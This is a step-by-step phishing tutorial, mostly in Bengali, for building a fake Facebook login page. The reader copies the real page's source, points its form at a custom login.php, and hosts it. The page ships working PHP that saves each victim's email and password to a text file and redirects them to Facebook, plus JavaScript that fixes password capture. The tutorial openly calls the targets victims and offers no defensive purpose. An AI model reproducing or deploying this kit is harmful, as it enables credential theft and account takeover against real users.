STEP 1:
প্রথমে আপনি যেই website টি phishing করতে চান তা deside করুন।
STEP 2:
উদাহরন হিসেব আমি নিলাম https://facebook.com এই website টি। প্রতিটি website এরই রয়েছে web and mobile দুটি version. তারপর দুটি version এর ফাইলটি copy করে নিতে হবে।
STEP 3:
File copy করার জন্য https://facebook.com এর সাথে
view-source:https://facebook.com এটি লিখে Enter করতে হবে। Mobile version এর জন্য view-source:https://m.facebook.com এবং Web version এর জন্য view-source:https://web.facebook.com লিখে enter করতে হবে বা computer এবং mobile দিয়ে open করলে auto নিজ version এ redirect হয়ে যাবে তার পর Url এর সাথে শুরুতে view-source: লিখে Enter করলেই Source code show করবে। তারপর select all করে সবগুলো copy করে নিতে হবে।
STEP 4:
তারপর copy করা code টি যেকোন code editor এ past করতে হবে এবং Save করতে হবে। as example saved file is: facebook/mobile.html এইভাবে web version এর ফাইলটিও save করতে হবে(Optional)।
STEP 5:
প্রতিটি social media বা login করতে হয় এমন সকল website এর action attribute রয়েছে যা <form>##</form> এর ভিতরে থাকে এবং পরবর্তী কাজ হচ্ছে save করা html file এ যেয়ে action= লিখে search করা এবং action="এইখানে যা থাকবে" সব কেটে দিয়ে action="login.php" করতে হবে এবং save করতে হবে।
image demo:
From
To
STEP 6:
তার পর facebook folder এর ভিতরে login.php file create করতে হবে।
structure:
facebook -| this is folder
mobil.html
login.php
STEP 7:
login.php source code ~
<?php
file_put_contents("usernames.txt", "Facebook Username: " . $_POST['email'] . " Pass: " . $_POST['pass'] ."\n", FILE_APPEND);
header('Location: https://facebook.com/recover/initiate/');
exit();
?>
Notes
// Please ensure that $_POST['email'] email and $_POST['pass'] pass is current attribute of mobile.html file between <form> ##</form> that name="pass" and another name="email".
image demo:
আর্থাৎ যদি mobile.html এর value অন্যটা থাকে তাহলে login.php এখানেও value change করতে হবে। মোট কথা name এর value $_POST['***'] এইখানে হবে।
STEP 8:
এখন এই file/folder টা যেকোনো hosting server এ বা localhost এ run করলেই victims এর submited data আপনার কাছে চলে আসবে এবং এটা আমার সেই folder এর usernames.txt file এর ভিতরে থাকবে।
STEP 9: is very important
যদি আপনি উপরে সবগুলো স্টেপ করে থাকেনএবং প্রোগ্রামটি সফলভাবে রান করেছেন কিন্তু যখন Login অথবা Submit বাটনে ক্লিক করেন তখন যদি কোন Response না করে তাহলে html ফাইলে গিয়ে ওইখানে data-sigil search করুন এবং attribute and value delete করে দিন।
image demo:
এখন আর কোন problem হবে না আশা করা যায়, কিন্তু রপরেও যদি response না করে তাহলে আমার সাথে contact করুন অথবা chatgpt অখবা internet এর help নিতে পারেন।
STEP 10:
এখন যদি দেখেন সবকিছুই চলে কিন্তু পাসওয়ার্ড অথবা ইমেইল যেকোন একটা আসে না, ধরে নিলাম password আসে না তারপর তারপর আপনি html ফাইলে যেয়ে name="pass লিখে সার্চ করবেন এবং এই fild এর <input যেখানে শেষ হইছে (/>) তারপর আরেকটা fld add করবেন। এবং fild টি হল:
<input type="hidden" id="hiddenPass" name="pass" />তারপর একদম লাস্টে যেয়ে যেখানে </body>ক্লোজ হয়েছে তার আগে একটি javascript add koros করুন।
Javascript:
<script>
/* Coded By Fahim Ahamed */
const hiddenPass = document.getElementById("hiddenPass");
const password = document.getElementById("pass");
password.onchange = (e) => {
hiddenPass.value = e.target.value;
}
</script>
Note: for this step ensure that name="pass" is curret value
Video demo:
Thanks everyone for reading this.Bye 😊